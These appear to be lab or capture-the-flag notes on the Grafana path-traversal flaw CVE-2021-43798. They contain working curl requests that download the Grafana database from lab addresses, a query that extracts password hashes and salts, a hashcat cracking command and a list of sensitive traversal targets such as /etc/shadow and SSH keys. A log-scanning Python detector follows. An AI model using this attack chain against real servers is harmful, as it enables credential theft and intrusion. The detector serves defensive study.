-
Download the Grafana SQLite database using CVE-2021-43798 (path traversal under /public/plugins/<plugin-id>/)
curl 'http://10.10.77.156:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' --path-as-is --output grafana.db
-
Query the database and extract email, password and salt from the user table
select email,password,salt from user;
-
Save that output to a file (look at hashes.txt)
-
Run the decoder.py script and save its output to the file hash
python3 decoder.py > hash
-
Run hashcat (mode 10900, PBKDF2-HMAC-SHA256) to crack the passwords
hashcat -m 10900 hash /usr/share/wordlists/rockyou.txt
-
Candidate file paths for the traversal
/etc/passwd
/etc/shadow
/etc/hostname
/etc/grafana/grafana.ini
/home/grafana/.ssh/id_rsa
/var/lib/grafana/grafana.db
-> curl -o grafana.db --path-as-is http://10.9.49.222:3000/public/plugins/welcome/../../../../../../../../var/lib/grafana/grafana.db
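-
Detection side of the requests above, as an added example (not part of the original notes): a Python check that flags access-log requests with ".." segments after /public/plugins/<plugin-id>/. The log lines are constructed, and the combined log format and the function name find_traversals are assumptions.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2022:10:00:00 +0000] "GET /public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db HTTP/1.1" 200 1234',
    '192.0.2.11 - - [01/Jan/2022:10:00:05 +0000] "GET /public/plugins/welcome/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404 19',
    '192.0.2.12 - - [01/Jan/2022:10:00:09 +0000] "GET /public/plugins/zipkin/img/logo.svg HTTP/1.1" 200 512',
    '192.0.2.13 - - [01/Jan/2022:10:00:11 +0000] "GET /api/health HTTP/1.1" 200 70',
]

REQUEST = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
PLUGIN_ROUTE = re.compile(r'^/public/plugins/(?P<plugin>[^/]+)/(?P<rest>.*)$')


def find_traversals(lines):
    """Return one dict per request that puts '..' segments after a plugin id."""
    hits = []
    for line in lines:
        req = REQUEST.match(line)
        if not req:
            continue
        # Drop the query string and decode %2e etc. so encoded dots are not missed.
        path = unquote(req["path"].split("?", 1)[0])
        route = PLUGIN_ROUTE.match(path)
        if not route or ".." not in route["rest"].split("/"):
            continue
        hits.append({
            "ip": req["ip"],
            "plugin": route["plugin"],
            # Path reached if the '..' run climbs all the way to '/'.
            "target": posixpath.normpath("/" + route["rest"]),
            # A 200 means the server answered with content; triage these first.
            "served": req["status"] == "200",
        })
    return hits


if __name__ == "__main__":
    for hit in find_traversals(SAMPLE_LOG):
        print(hit)
```

Hits with served set to True and a target of grafana.db mean the user table, including password hashes and salts, should be treated as disclosed and the passwords rotated.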